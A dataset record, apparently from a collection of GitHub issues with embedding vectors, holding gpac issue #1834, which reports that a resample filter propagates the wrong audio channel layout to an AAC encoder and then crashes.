-0.008860672824084759, 0.009540557861328125, 0.02621990628540516, 0.013309485279023647, 0.0067434231750667095, -0.0011870271991938353, -0.010190882720053196, 0.009466657415032387, -0.012156636454164982, 0.006022892892360687, 0.0026844367384910583, 0.013117343187332153, 0.023160425946116447, 0.004773973952978849, -0.0007066737744025886, 0.009658798575401306, -0.010375633835792542, 0.01807606965303421, -0.01213446632027626, -0.01025739312171936, -0.01795782893896103, 0.014159341342747211, 0.003986933268606663, -0.0019343462772667408, 0.007899966090917587, 0.008831112645566463, 0.009267126210033894, -0.004792449064552784, -0.01004308182746172, 0.006418260745704174, 0.01745530404150486, 0.0014595354441553354, -0.015726031735539436, 0.0030631767585873604, 0.01733706332743168, -0.012489189393818378, 0.011927545070648193, -0.0035915656480938196, 0.0016359728761017323, 0.021933676674962044, 0.0250227190554142, 0.016228556632995605, 0.005516674369573593, -0.0014789343113079667, -0.005487114191055298, -0.016671959310770035, 0.011794524267315865, 0.01404110062867403, -0.014004150405526161, 0.04292142763733864, 0.005956382490694523, 0.005705120507627726, 0.021253792569041252, 0.045138441026210785, 0.007988646626472473, -0.0034474595449864864, -0.01846035197377205, 0.014839226379990578, -0.014905736781656742, 0.0010179798118770123, -0.008705481886863708, -0.014587963931262493, 0.025599142536520958, 0.028348242864012718, -0.0029855812899768353, -0.00007644086144864559, -0.015859052538871765, -0.0005611821543425322, 0.030890420079231262, -0.0033255238085985184, 0.0017283485503867269, -0.0025384831242263317, -0.011698453687131405, 0.022007577121257782, 0.0020636722911149263, 0.020440885797142982, -0.007419613189995289, 0.011085079051554203, 0.017721345648169518, -0.005372568499296904, 0.0035139701794832945, -0.0044229463674128056, 0.0037596893962472677, -0.016125096008181572, 0.008771992288529873, -0.010759917087852955, 0.01532696932554245, 0.00017874690820463002, 0.016346797347068787, -0.01608075387775898, -0.00483309431001544, -0.004404471255838871, 0.010456924326717854, 0.005187816917896271, 0.004578137770295143, -0.000055829539633123204, 0.0038649975322186947, 0.001741281128488481, -0.00015057231939863414, -0.005143476650118828, -0.010272173210978508, -0.006425650790333748, -0.006388700567185879, -0.007988646626472473, 0.0060524530708789825, -0.0021948455832898617, -0.0037947921082377434, 0.01600685343146324, -0.023426467552781105, -0.001073405146598816, 0.026751991361379623, 0.0035509204026311636, 0.0014613829553127289, -0.03059481829404831, 0.006388700567185879, 0.008254689164459705 ]
192
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
``` $ gpac -i avgen:ch=2 @ resample:och=1 @ ffenc:c=aac @ -o null No filter chain found for PID video in filter avgen to any loaded filters - NOT CONNECTED [aac @ 0x55e6bd9f0740] Channel layout 'stereo' with 2 channels does not match number of specified channels 1 [FFEnc] PID audio failed to open codec context: Invalid argument Failed to reconfigure PID resample:audio in filter ffenc:aac: Bad Parameter Erreur de segmentation ```
'resample' audio layout wrong propagation + bonus crash
https://api.github.com/repos/gpac/gpac/issues/1834/comments
0
2021-06-28T14:19:00
2021-07-06T08:57:31Z
https://github.com/gpac/gpac/issues/1834
931,625,653
1,834
false
This is a GitHub Issue repo:gpac owner:gpac Title : 'resample' audio layout wrong propagation + bonus crash Issue date: --- start body --- ``` $ gpac -i avgen:ch=2 @ resample:och=1 @ ffenc:c=aac @ -o null No filter chain found for PID video in filter avgen to any loaded filters - NOT CONNECTED [aac @ 0x55e6bd9f0740] Channel layout 'stereo' with 2 channels does not match number of specified channels 1 [FFEnc] PID audio failed to open codec context: Invalid argument Failed to reconfigure PID resample:audio in filter ffenc:aac: Bad Parameter Erreur de segmentation ``` --- end body ---
597
[ -0.02434512972831726, 0.02180684171617031, -0.016099197790026665, 0.02747241221368313, -0.0007949680439196527, 0.021554414182901382, -0.025186549872159958, 0.045773331075906754, -0.01992766559123993, 0.040304090827703476, -0.04625013470649719, 0.013126175850629807, 0.00032057284261099994, 0.018272871151566505, 0.00975347775965929, -0.008238919079303741, -0.018525296822190285, 0.013084104284644127, 0.0027013137005269527, -0.008316049352288246, 0.03404952585697174, -0.02900099568068981, -0.01695464365184307, 0.03988337889313698, -0.006643724162131548, -0.0006959257298149168, -0.02727608010172844, -0.0021929547656327486, -0.016533933579921722, -0.009206553921103477, -0.015930913388729095, 0.00840720348060131, -0.0195350032299757, 0.020867252722382545, 0.03536774963140488, 0.005437686573714018, 0.01750156842172146, 0.06579916179180145, 0.03996752202510834, 0.02720596268773079, -0.0033867217134684324, 0.022690333425998688, -0.03503118082880974, 0.018903937190771103, -0.008652618154883385, 0.0248920526355505, 0.007418532855808735, 0.036040887236595154, -0.035648226737976074, 0.015538251027464867, 0.02479388751089573, -0.013462744653224945, -0.002971269655972719, -0.026350516825914383, -0.037976156920194626, -0.02182086557149887, 0.022942759096622467, -0.0023244270123541355, -0.00852640438824892, 0.02203121967613697, -0.025803593918681145, 0.003968704957515001, -0.023111043497920036, 0.028776615858078003, -0.01337159052491188, 0.008077646605670452, -0.025326788425445557, 0.01490718498826027, -0.016085173934698105, 0.01970328763127327, 0.007106505800038576, -0.043192971497774124, -0.02006790228188038, 0.03702254593372345, 0.03772373124957085, 0.0015092998510226607, 0.04232350364327431, 0.022606192156672478, -0.04672694206237793, 0.03430195152759552, -0.040921133011579514, 0.03177768737077713, -0.05110233277082443, 0.006889138836413622, -0.022998854517936707, 0.012004280462861061, -0.03904195874929428, -0.06147986650466919, -0.015846772119402885, -0.0136450519785285, -0.023012878373265266, 0.028496142476797104, 0.021526366472244263, 0.01970328763127327, -0.0017249140655621886, 0.0068505736999213696, -0.01229877769947052, -0.00016028642130549997, -0.010903420858085155, -0.007530722767114639, -0.04117355868220329, -0.028832711279392242, -0.01989961974322796, 0.015482155606150627, 0.04249178618192673, 0.00839317962527275, -0.003439310472458601, -0.00868066493421793, 0.022984830662608147, 0.1355249583721161, 0.025985900312662125, 0.0011665958445519209, -0.008035575039684772, -0.018258847296237946, 0.008316049352288246, 0.00009948056685971096, -0.023391518741846085, -0.01977340504527092, -0.010608922690153122, 0.010756171308457851, -0.0032289549708366394, -0.0015960714081302285, -0.04403439164161682, 0.020811159163713455, -0.020698970183730125, 0.04016385227441788, 0.008070634678006172, 0.002366498112678528, -0.028580283746123314, 0.02190500684082508, -0.021442225202918053, -0.023223234340548515, 0.0009036516421474516, -0.03205816075205803, 0.030207032337784767, -0.021694650873541832, -0.040444329380989075, 0.03895781561732292, 0.0016065891832113266, -0.011218953877687454, -0.018118610605597496, -0.03536774963140488, 0.05127061903476715, -0.018202751874923706, -0.009458980523049831, -0.0022788499481976032, 0.017725946381688118, -0.004873232915997505, -0.013757241889834404, 0.0071450709365308285, -0.04094918072223663, -0.01487913727760315, 0.025873711332678795, 0.016253458335995674, 0.05208399146795273, -0.02900099568068981, -0.012579252012073994, 0.002976528601720929, 0.04013580456376076, -0.0041825659573078156, 0.006952245254069567, -0.0018651509890332818, -0.007124035619199276, 0.004613794852048159, -0.003979222383350134, -0.0077551016584038734, 0.030122891068458557, 0.01921245828270912, -0.01968926377594471, 0.022662285715341568, -0.020614827051758766, 0.014388307929039001, -0.004354356322437525, -0.00026272510876879096, -0.016029080376029015, -0.05438387766480446, 0.018314940854907036, 0.06944531947374344, -0.04136989265680313, -0.007558770012110472, -0.01995571330189705, -0.0020562238059937954, 0.013259400613605976, -0.0006187953986227512, 0.020712992176413536, -0.02486400492489338, 0.030992358922958374, -0.040640659630298615, 0.02421891689300537, -0.005676089320331812, 0.028860757127404213, 0.022718381136655807, 0.0066647594794631, 0.005802302621304989, 0.004785584751516581, -0.003933645784854889, -0.018749676644802094, 0.01731926016509533, 0.0011701018083840609, -0.005956563167273998, -0.01232682541012764, -0.02685537002980709, 0.010370519943535328, -0.014486473985016346, -0.043164923787117004, 0.014128869399428368, 0.00875078421086073, 0.047904931008815765, 0.009451968595385551, -0.04476362466812134, -0.043361254036426544, -0.040304090827703476, 0.0027679260820150375, 0.035536035895347595, -0.01945086009800434, -0.009290696121752262, 0.008477321825921535, 0.016351625323295593, 0.03360076621174812, -0.001201655133627355, 0.0531778410077095, -0.008905044756829739, 0.012992950156331062, -0.012677417136728764, -0.02706572599709034, -0.002362992148846388, 0.018174704164266586, -0.003058917820453644, -0.015075468458235264, 0.002983540529385209, -0.009045281447470188, 0.008603534661233425, -0.011527474969625473, 0.013266412541270256, 0.010889397002756596, -0.011667711660265923, -0.025158504024147987, 0.0007756854756735265, 0.01350481528788805, 0.009003209881484509, -0.013715170323848724, 0.054972872138023376, -0.02731815166771412, 0.02252204902470112, 0.013098128139972687, 0.02469572238624096, 0.0019072220893576741, 0.00976750161498785, -0.012775583192706108, 0.012915819883346558, -0.008238919079303741, 0.011464368551969528, -0.028285786509513855, 0.0064193448051810265, -0.03693840280175209, 0.01947890780866146, 0.012684429064393044, -0.008933091536164284, -0.012817654758691788, -0.03264715522527695, -0.023868324235081673, 0.013624017126858234, -0.04381001368165016, -0.052504703402519226, -0.004161530639976263, -0.06142377108335495, 0.00014297592861112207, 0.0016013303538784385, 0.004196589812636375, 0.00026623101439327, 0.0038109382148832083, -0.00018778600497171283, -0.045324571430683136, 0.0005066058947704732, 0.007124035619199276, -0.006920692045241594, 0.048185404390096664, -0.007593829184770584, 0.03674207255244255, 0.031048454344272614, -0.0034270398318767548, 0.024990219622850418, 0.012936855666339397, 0.0020544708240777254, -0.010650994256138802, 0.057665422558784485, 0.02253607288002968, -0.014149905182421207, -0.038256630301475525, 0.01975938118994236, 0.0266590379178524, 0.009346790611743927, -0.05595453083515167, 0.012081410735845566, -0.016393695026636124, 0.0007879561744630337, 0.01744547300040722, -0.006282614078372717, 0.02417684532701969, -0.007839243859052658, 0.0027942205779254436, 0.012922831811010838, 0.012782595120370388, -0.0341336652636528, -0.045520905405282974, 0.015117540024220943, -0.011429308913648129, 0.030487505719065666, -0.02001180872321129, 0.00976048968732357, 0.03278739005327225, -0.03651769459247589, -0.014170940965414047, 0.015636416152119637, -0.0011525722220540047, -0.009290696121752262, -0.025074360892176628, -0.03503118082880974, -0.03632136061787605, 0.035844556987285614, -0.008386167697608471, 0.004031811375170946, -0.060301873832941055, 0.01994168944656849, 0.02706572599709034, 0.0011297836899757385, -0.011401261202991009, 0.015776652842760086, -0.03923828899860382, -0.011681735515594482, 0.004641842097043991, 0.0038284678012132645, -0.01369413547217846, -0.06400413066148758, 0.009571169503033161, -0.01472487673163414, -0.020166069269180298, -0.023980513215065002, -0.0020860242657363415, -0.018679557368159294, -0.011331142857670784, 0.04221131280064583, 0.0058899507857859135, -0.02222755178809166, 0.0012700206134468317, 0.0026680072769522667, -0.03461047261953354, -0.023615896701812744, 0.03766763582825661, -0.019086245447397232, 0.0009001457365229726, 0.03674207255244255, -0.0012665146496146917, 0.02455548383295536, 0.016435766592621803, -0.0147389005869627, -0.010854337364435196, -0.009634275920689106, 0.020446542650461197, -0.021091632544994354, 0.016449790447950363, -0.030599696561694145, 0.011373214423656464, 0.0026855370961129665, -0.015608369372785091, 0.020572755485773087, -0.014220023527741432, -0.0009948055958375335, 0.007397497538477182, -0.005262390244752169, -0.01213049329817295, 0.006706830579787493, -0.04406243935227394, 0.005258884280920029, -0.017655828967690468, 0.015678487718105316, 0.037948109209537506, -0.035255562514066696, -0.011843007989227772, 0.012263718992471695, -0.023742109537124634, -0.00281525612808764, 0.01720706932246685, -0.03699449822306633, 0.0385090596973896, 0.01349780336022377, -0.02252204902470112, 0.04675498977303505, -0.03259105980396271, -0.023433588445186615, -0.02487802878022194, -0.009374838322401047, -0.04969996586441994, -0.04223936051130295, -0.03250691667199135, 0.010237295180559158, -0.018735652789473534, -0.033039819449186325, 0.004582241177558899, -0.009830608032643795, 0.010700076818466187, -0.016071150079369545, -0.0052729081362485886, 0.04347344487905502, -0.02451341412961483, 0.023924417793750763, -0.01098756305873394, -0.040836989879608154, 0.0242609865963459, 0.0030273646116256714, 0.03887367248535156, 0.00978853739798069, -0.03205816075205803, 0.00041391802369616926, -0.0017626028275117278, 0.013455732725560665, -0.016688194125890732, -0.00047943496610969305, -0.038032252341508865, 0.0346946120262146, -0.019072221592068672, 0.008196847513318062, 0.011225965805351734, -0.01942281424999237, 0.021287964656949043, 0.02180684171617031, -0.006086282432079315, 0.011338154785335064, 0.013070080429315567, -0.01691257208585739, 0.033152006566524506, -0.01365907583385706, -0.0014979055849835277, 0.012053363025188446, -0.003982728347182274, -0.008091670460999012, -0.029926558956503868, -0.03926633670926094, -0.008652618154883385, -0.0032482375390827656, -0.03432999923825264, 0.007895338349044323, -0.0030115877743810415, 0.03158135339617729, 0.017992395907640457, -0.033039819449186325, -0.04179060086607933, -0.014654758386313915, 0.023896371945738792, -0.02219950407743454, 0.009683359414339066, 0.021428201347589493, 0.008498357608914375, -0.02430305816233158, -0.016211388632655144, 0.023475660011172295, 0.009795548394322395, 0.006503487005829811, 0.054804589599370956, 0.01363102812319994, -0.057777609676122665, -0.0011481897672638297, 0.013890466652810574, -0.010777207091450691, 0.02201719582080841, 0.01126803644001484, -0.013757241889834404, -0.020712992176413536, 0.010300401598215103, -0.030992358922958374, -0.00733439065515995, 0.002625936409458518, 0.03132892772555351, -0.00749566312879324, -0.040780894458293915, 0.02914123237133026, -0.02737424708902836, -0.014248071238398552, 0.028131525963544846, -0.04142598435282707, -0.03432999923825264, -0.016113221645355225, 0.017922278493642807, 0.010328449308872223, -0.013126175850629807, -0.011499427258968353, 0.02417684532701969, 0.021694650873541832, -0.028720520436763763, 0.02229767106473446, 0.0030396352522075176, 0.04751226678490639, 0.02235376462340355, -0.02744436450302601, 0.010174188762903214, -0.03374100103974342, 0.011955196969211102, -0.015075468458235264, 0.02430305816233158, 0.018286895006895065, -0.011800936423242092, -0.023377494886517525, 0.02490607649087906, 0.0020772593561559916, 0.007923386059701443, -0.03505922853946686, -0.003912610001862049, 0.04268811643123627, -0.001284920726902783, -0.033376388251781464, 0.0028240210376679897, 0.008210871368646622, -0.010026940144598484, -0.05124257132411003, -0.0014347989344969392, -0.018174704164266586, -0.0010754418326541781, -0.008954127319157124, 0.011997268535196781, -0.005816326010972261, -0.03228253871202469, -0.006457909941673279, 0.012389931827783585, 0.030543601140379906, -0.014794995076954365, 0.023377494886517525, 0.016281506046652794, 0.018090562894940376, 0.026532825082540512, -0.005665571428835392, -0.02001180872321129, -0.013792300596833229, 0.009115399792790413, 0.03634940832853317, -0.016001032665371895, 0.017936302348971367, -0.01244602631777525, 0.023139091208577156, 0.010419603437185287, -0.00884193740785122, -0.028524190187454224, 0.06793076545000076, -0.045380666851997375, 0.012978927232325077, -0.01346975564956665, 0.04504409804940224, -0.00868767686188221, 0.013301472179591656, -0.021358082070946693, -0.019002102315425873, -0.007937409915030003, -0.01701073907315731, -0.004399933386594057, 0.023097021505236626, -0.007222201209515333, 0.01351182721555233, 0.0018230800051242113, 0.05707642436027527, 0.004631324205547571, 0.01233383733779192, 0.01472487673163414, 0.023994537070393562, 0.02738827094435692, -0.004014282021671534, -0.007425544783473015, 0.006212495733052492, 0.01455659233033657, 0.0003389789198990911, -0.022662285715341568, -0.042632024735212326, -0.0010105823166668415, 0.0010956008918583393, -0.007706018630415201, 0.0014400578802451491, -0.015734583139419556, -0.006941727362573147, 0.014780971221625805, -0.01940879039466381, -0.004203601740300655, -0.01696866750717163, 0.017838135361671448, -0.022592168301343918, -0.013077092356979847, 0.007895338349044323, 0.008168800733983517, -0.0192545298486948, -0.007923386059701443, 0.004732996225357056, -0.0028047384694218636, -0.0030045760795474052, -0.01703878492116928, 0.006797984708100557, -0.004820643924176693, -0.036068934947252274, 0.031076502054929733, -0.012761559337377548, 0.010272353887557983, 0.026294423267245293, 0.015313871204853058, -0.0032534964848309755, -0.018441155552864075, 0.018637485802173615, -0.023531755432486534, -0.03430195152759552, -0.026280399411916733, 0.011723806150257587, -0.0031553306616842747, -0.015594345517456532, -0.04229545593261719, 0.03926633670926094, 0.0011280307080596685, 0.04013580456376076, 0.05716056749224663, -0.024036608636379242, -0.008912056684494019, 0.033123958855867386, 0.01454256847500801, -0.008659630082547665, -0.012403955683112144, 0.011864043772220612, 0.021245893090963364, -0.014921207912266254, 0.006797984708100557, -0.04195888713002205, -0.00549378152936697, 0.040556516498327255, -0.0038565152790397406, -0.009844631887972355, -0.006654242053627968, 0.0046769012697041035, -0.04641842097043991, 0.012642358429729939, -0.040528468787670135, -0.024976195767521858, -0.006864597089588642, 0.013315495103597641, 0.021231869235634804, 0.0029064102564007044, -0.013294460251927376, -0.005353544373065233, -0.004568217787891626, -0.006426356732845306, 0.011618629097938538, -0.0006332573248073459, -0.025144480168819427, 0.00842122733592987, -0.008217883296310902, 0.0009255636832676828, 0.009094364009797573, 0.011576557531952858, -0.017796065658330917, -0.04170646145939827, 0.016001032665371895, 0.006272096186876297, 0.033376388251781464, -0.03242277726531029, 0.037779826670885086, 0.03508727625012398, -0.0219330545514822, -0.033208101987838745, -0.023068973794579506, 0.00029274457483552396, -0.009395873174071312, -0.026420636102557182, 0.020544707775115967, 0.008617558516561985, 0.0038389856927096844, -0.028187621384859085, -0.026448683813214302, 0.008806878700852394, 0.0009702641982585192, -0.007155588828027248, 0.040191899985075, -0.00682252598926425, 0.018174704164266586, -0.010721112601459026, 0.015608369372785091, -0.023223234340548515, 0.0026697602588683367, 0.0004373638948891312, -0.02236778847873211, 0.0036181125324219465, -0.00991475023329258, 0.012649370357394218, -0.007404509466141462, -0.0019405283965170383, -0.004564711824059486, 0.003800420556217432, 0.006868103053420782, -0.01486511342227459, 0.011850019916892052, 0.04378196597099304, -0.014234047383069992, 0.060021400451660156, -0.011969220824539661, -0.0025102407671511173, 0.005209801718592644, 0.03222644329071045, 0.00858249980956316, 0.011857031844556332, -0.03519946709275246, 0.0005101118003949523, 0.01754363812506199, -0.05127061903476715, -0.006398309487849474, 0.052841272205114365, -0.006506992969661951, -0.015860795974731445, 0.026112115010619164, 0.02194707840681076, 0.0013594216434285045, 0.005788278765976429, -0.022830570116639137, 0.001774873468093574, -0.022858617827296257, -0.01687050051987171, -0.014752923510968685, -0.023097021505236626, -0.027542531490325928, 0.03679816797375679, -0.033123958855867386, -0.0167863592505455, -0.003653171705082059, -0.028173597529530525, -0.017978373914957047, 0.042800307273864746, 0.03435804694890976, 0.005251872818917036, 0.0010903420625254512, 0.004536664113402367, -0.030319221317768097, -0.033320292830467224, 0.002862586174160242, 0.006959257181733847, -0.04582942649722099, -0.006265084259212017, -0.006447392515838146, -0.002384027699008584, 0.002857327228412032, 0.028860757127404213, -0.011941174045205116, -0.0076288883574306965, -0.01687050051987171, -0.01747352071106434, 0.02226962335407734, -0.015454108826816082, -0.0297582745552063, -0.0037373139057308435, -0.016295529901981354, 0.0002214209525845945, 0.007902350276708603, 0.028061406686902046, 0.047904931008815765, -0.026420636102557182, -0.015075468458235264, 0.010496733710169792, -0.0011218953877687454, -0.015622393228113651, -0.0245414599776268, -0.025410929694771767, 0.020642874762415886, -0.01936671882867813, 0.005854891613125801, 0.00989371445029974, 0.0030659297481179237, 0.015313871204853058, -0.006773443426936865, -0.011183894239366055, -0.00040844001341611147, -0.007411521393805742, 0.00012424115266185254, -0.005655054003000259, -0.020993467420339584, 0.015271800570189953, 0.045380666851997375, -0.005655054003000259, -0.009283684194087982, 0.031132595613598824, -0.00682603195309639, -0.0019808465149253607, -0.03197401762008667, -0.006605159025639296, -0.02451341412961483, 0.010104070417582989, -0.000956240517552942, -0.033236149698495865, 0.028285786509513855, 0.00038740449235774577, 0.020278258249163628, -0.00021079361613374203, 0.006121341604739428, -0.0077551016584038734, 0.02714986726641655, -0.04223936051130295, -0.038116395473480225, -0.0044244746677577496, 0.018202751874923706, 0.013028009794652462, -0.03166549652814865, -0.030347269028425217, 0.004603276960551739, -0.01454256847500801, -0.021049560979008675, -0.026504777371883392, -0.016590027138590813, -0.021049560979008675, -0.006440380588173866, -0.005237848963588476, -0.030263127759099007, 0.01094549149274826, 0.0035742884501814842, -0.0010491474531590939, 0.012067386880517006, -0.013315495103597641, -0.023924417793750763, -0.00442096870392561, 0.012537180446088314, -0.01960512064397335, -0.028566259890794754, 0.006917186081409454, -0.03424585610628128, 0.0061248475685715675, -0.0061774360947310925, -0.04094918072223663, 0.021316012367606163, -0.035760413855314255, -0.016407718881964684, 0.015412037260830402, -0.007853267714381218, -0.003309591207653284, -0.0198154766112566, -0.008028564043343067, -0.01755766198039055, 0.013210318051278591, -0.02712181955575943, 0.020923348143696785, 0.020292282104492188, -0.004778572823852301, -0.02475181594491005, 0.011857031844556332, -0.004301767330616713, -0.012102446518838406, 0.015313871204853058, -0.02967413142323494, 0.0036146065685898066, -0.03758349269628525, 0.006187953986227512, -0.022746428847312927, 0.022732404991984367, -0.01754363812506199, 0.0067278663627803326, 0.028692474588751793, -0.002711831359192729, 0.027935193851590157, -0.022802522405982018, 0.026013948023319244, -0.004929327871650457, -0.01695464365184307, -0.003555005881935358, -0.012656382285058498, 0.03365686163306236, 0.02207329124212265, -0.009185518138110638, -0.009480015374720097, 0.0085684759542346, -0.002624183427542448, 0.0009667582344263792, -0.047848835587501526, -0.05155109241604805, 0.003681219182908535, -0.022648261860013008, -0.0019861054606735706, -0.025523118674755096, 0.01097353920340538, -0.00883492548018694, -0.000010921771718130913, -0.010342473164200783, -0.028510166332125664, -0.0589556023478508, 0.0044314865954220295, -0.010468685999512672, 0.01682843081653118, -0.03132892772555351, 0.002012399723753333, 0.012389931827783585, -0.018413107842206955, 0.004841679707169533, -0.014780971221625805, -0.016576003283262253, -0.006335202604532242, 0.0058934567496180534, -0.015131563879549503, -0.021372105926275253, -0.022662285715341568, 0.020502638071775436, 0.04734398424625397, -0.011737830005586147, -0.03615307807922363, 0.006310661323368549, -0.005006458144634962, -0.01367309968918562, -0.02494814805686474, 0.002242037793621421, 0.010377531871199608, -0.014921207912266254, -0.02189098298549652, -0.003320109099149704, 0.03231058642268181, -0.021021515130996704, 0.020166069269180298, 0.007839243859052658, -0.00004097547571291216, -0.017725946381688118, -0.037920061498880386, -0.006959257181733847, -0.0047925966791808605, -0.02981436997652054, 0.03749935328960419, 0.004505110904574394, 0.03960290551185608, -0.010896408930420876, 0.01213750522583723, 0.026182232424616814, 0.015846772119402885, 0.0013699394185096025, -0.012544192373752594, -0.01682843081653118, -0.0026820311322808266, 0.001653919112868607, 0.016113221645355225, 0.02493412420153618, -0.026448683813214302, 0.015271800570189953, -0.011296084150671959, 0.04106137156486511, -0.006710336543619633, 0.003923127893358469, -0.004442004486918449, 0.004214119631797075, -0.03444218635559082, 0.0067278663627803326, 0.011885078623890877, 0.04327711462974548, -0.01936671882867813, 0.0006301896646618843, 0.01949293166399002, -0.0016959902131929994, 0.007558770012110472, -0.035283610224723816, -0.027654720470309258, -0.033348340541124344, -0.001884433557279408, -0.035788461565971375, -0.02484998293220997, -0.0022052256390452385, 0.01334354281425476, -0.01733328402042389, -0.0008786719408817589, 0.004508616868406534, 0.01689854823052883, 0.006216001231223345, 0.02246595360338688, 0.018469201400876045, -0.005960069131106138, -0.021119680255651474, 0.002166660502552986, -0.014065762981772423, 0.010503745637834072, 0.0016881019109860063, -0.017697898671030998, -0.0033902274444699287, -0.023545779287815094, 0.006359744351357222, 0.021063584834337234, -0.002860833192244172, 0.02981436997652054, -0.013911502435803413, -0.031104547902941704, -0.0168564785271883, -0.004617300350219011, -0.0047925966791808605, -0.003579547395929694, 0.01708085648715496, -0.028972947970032692, -0.004778572823852301, -0.025663355365395546, 0.008806878700852394, 0.0005780390347354114, -0.008926079608500004, -0.0015329648740589619, 0.015145587734878063, -0.010847325436770916, 0.009052293375134468, -0.04459534212946892, 0.04829759523272514, -0.01351883914321661, 0.0013778277207165956, -0.011036645621061325, -0.01996973715722561, -0.028664426878094673, -0.04857806861400604, -0.04173450544476509, 0.019002102315425873, 0.004140494856983423, -0.013729194179177284, 0.013112151995301247, 0.01486511342227459, -0.004347344394773245, -0.00040712530608288944, -0.005896962247788906, -0.010391555726528168, -0.010721112601459026, 0.023181162774562836, -0.009984868578612804, 0.0038109382148832083, 0.025088384747505188, -0.03926633670926094, 0.0033674389123916626, 0.02180684171617031, 0.047624457627534866, -0.018974054604768753, -0.001044764998368919, -0.012382919900119305, 0.0440063439309597, 0.014058751054108143, 0.025943830609321594, -0.004711960442364216, -0.011632652021944523, 0.010721112601459026, -0.0067839608527719975, 0.007944421842694283, -0.00993578601628542, -0.01369413547217846, 0.011450344696640968, -0.0008383538224734366, -0.0171369519084692, 0.014949255622923374, -0.018875889480113983, -0.02182086557149887, 0.02179281786084175, 0.020741039887070656, 0.002599641913548112, -0.02224157564342022, -0.04714765399694443, 0.007677971385419369, 0.025789570063352585, 0.002450640080496669, 0.030487505719065666, 0.015987008810043335, -0.005788278765976429, 0.03203011304140091, 0.000028485625080065802, 0.02727608010172844, -0.026224303990602493, 0.012109458446502686, -0.0025786063633859158, -0.014388307929039001, 0.0085684759542346, 0.009697383269667625, 0.003555005881935358, -0.019072221592068672, -0.028888804838061333, 0.05084990710020065, -0.007131047546863556, -0.0071380590088665485, -0.02476583980023861, -0.020755063742399216, 0.02243790775537491, -0.005367568228393793, 0.019016126170754433, 0.018146656453609467, 0.004094918258488178, -0.012719488702714443, 0.00053246202878654, 0.015776652842760086, -0.01712292805314064, 0.00010211000335402787, -0.01215152908116579, -0.003053658874705434, -0.015215706080198288, 0.012354872189462185, -0.023265304043889046, 0.004252684768289328, -0.007180130109190941, -0.055393584072589874, 0.005816326010972261, 0.008189836516976357, -0.021442225202918053, 0.006766431499272585, -0.0123408492654562, -0.019184410572052002, -0.005248366855084896, 0.004729490261524916, -0.03626526892185211, -0.011162858456373215, 0.017936302348971367, 0.033348340541124344, 0.06299442052841187, 0.03859319910407066, -0.018469201400876045, -0.005353544373065233, 0.008652618154883385, -0.0014637229032814503, 0.010447650216519833, 0.000594253942836076, 0.004175554495304823, 0.0133645785972476, -0.00334640359506011, 0.009003209881484509, 0.004035317339003086, 0.0025330292992293835, -0.02936561033129692, 0.006622688379138708, -0.008344097062945366, -0.01709488034248352, -0.013904490508139133, 0.03225449100136757, 0.03390928730368614, 0.0170668326318264, 0.016365649178624153, -0.032759346067905426, -0.0029221868608146906, -0.000654292874969542, 0.02970217913389206, -0.02001180872321129, -0.025943830609321594, 0.004347344394773245, -0.008280989713966846, -0.006261578295379877, 0.013862419873476028, -0.009571169503033161, 0.02226962335407734, 0.005998634267598391, -0.005497287027537823, 0.0010745653416961432, -0.0015540003078058362, -0.009283684194087982, 0.00494335126131773, -0.00683304388076067, -0.010672029107809067, 0.004841679707169533, 0.012950879521667957, -0.018791746348142624, 0.022788498550653458, -0.02243790775537491, -0.0024331104941666126, 0.005781266838312149, -0.017627781257033348, -0.032731298357248306, 0.007684983313083649, 0.03225449100136757, -0.005595453083515167, -0.0036917368415743113, -0.010321437381207943, 0.006636712234467268, -0.023391518741846085, 0.0019615639466792345, 0.013189282268285751, 0.009437944740056992, 0.008505369536578655, -0.007909362204372883, -0.008189836516976357, -0.021245893090963364, 0.005728678312152624, 0.015355942770838737, 0.016660146415233612, 0.02201719582080841, 0.0005215060664340854, 0.0053956154733896255, -0.005213307682424784, 0.006037199404090643, 0.013210318051278591, 0.0171369519084692, -0.020741039887070656, 0.025957854464650154, -0.007039893418550491, -0.010875373147428036, -0.01954902708530426, 0.02226962335407734, 0.015075468458235264, 0.011317119002342224, -0.018216775730252266, 0.003560264827683568, -0.005371074192225933, 0.020306305959820747, 0.00614588288590312, -0.015580321662127972, -0.007215189281851053, -0.005914492066949606, 0.011681735515594482, 0.025649333372712135, -0.007818208076059818, 0.02247997745871544, 0.0003126845113001764, -0.01710890419781208, -0.026518801227211952, -0.012936855666339397, -0.0025084877852350473, -0.008912056684494019, 0.018413107842206955, 0.030178984627127647, -0.0133645785972476, 0.016604050993919373, 0.009970844723284245, 0.011639663949608803, 0.018988078460097313, -0.02236778847873211, -0.02998265251517296, -0.014935231767594814, 0.01736132986843586, -0.01991364173591137, -0.01126803644001484, -0.01353987492620945, -0.007832231931388378, 0.026027971878647804, -0.001777502940967679, -0.02190500684082508, -0.011835996061563492, 0.01486511342227459, 0.008210871368646622, -0.01758570969104767, 0.008876997046172619, 0.0007879561744630337, 0.011983244679868221, -0.021147727966308594, 0.017978373914957047, 0.035844556987285614, 0.04695132002234459, 0.0015145586803555489, 0.0032377198804169893, 0.0020965419244021177, 0.030431412160396576, -0.028454070910811424, 0.017824113368988037, -0.007215189281851053, 0.013911502435803413, -0.00872273650020361, -0.0007178377127274871, 0.031048454344272614, 0.018090562894940376, 0.020979443565011024, 0.01003395114094019, -0.006268590223044157, -0.0015092998510226607, 0.011050669476389885, 0.016071150079369545, 0.0036461600102484226, -0.002608406590297818, -0.002252555452287197, 0.0222836472094059, 0.017838135361671448, 0.012600286863744259, 0.010307413525879383, 0.010840313509106636, -0.02252204902470112, -0.014809018932282925, 0.01929659955203533, 0.02219950407743454, 0.022830570116639137, 0.0020649887155741453, -0.005367568228393793, -0.006436874624341726, 0.0198154766112566, 0.003993246238678694, -0.04613794758915901, -0.016183340921998024, -0.01126102451235056, 0.005146694835275412, -0.001310338731855154, -0.04125770181417465, -0.016407718881964684, -0.0002616294950712472, 0.00013519715867005289, -0.01694061979651451, -0.006380779668688774, 0.00334289763122797, 0.011457356624305248, 0.006289626006036997, 0.0293375626206398, 0.016519909724593163, 0.015454108826816082, 0.04378196597099304, -0.02208731509745121, -0.003058917820453644, 0.00010013792780227959, -0.009234600700438023, 0.021358082070946693, 0.005805808585137129, 0.010538804344832897, -0.011625641025602818, -0.007572793867439032, -0.0344141386449337, -0.010237295180559158, -0.013448720797896385, -0.005658559501171112, 0.00003826386091532186, -0.016281506046652794, 0.0034831345546990633, -0.0021806841250509024, -0.0032482375390827656, 0.0038074322510510683, 0.008947115391492844, -0.05693618953227997, 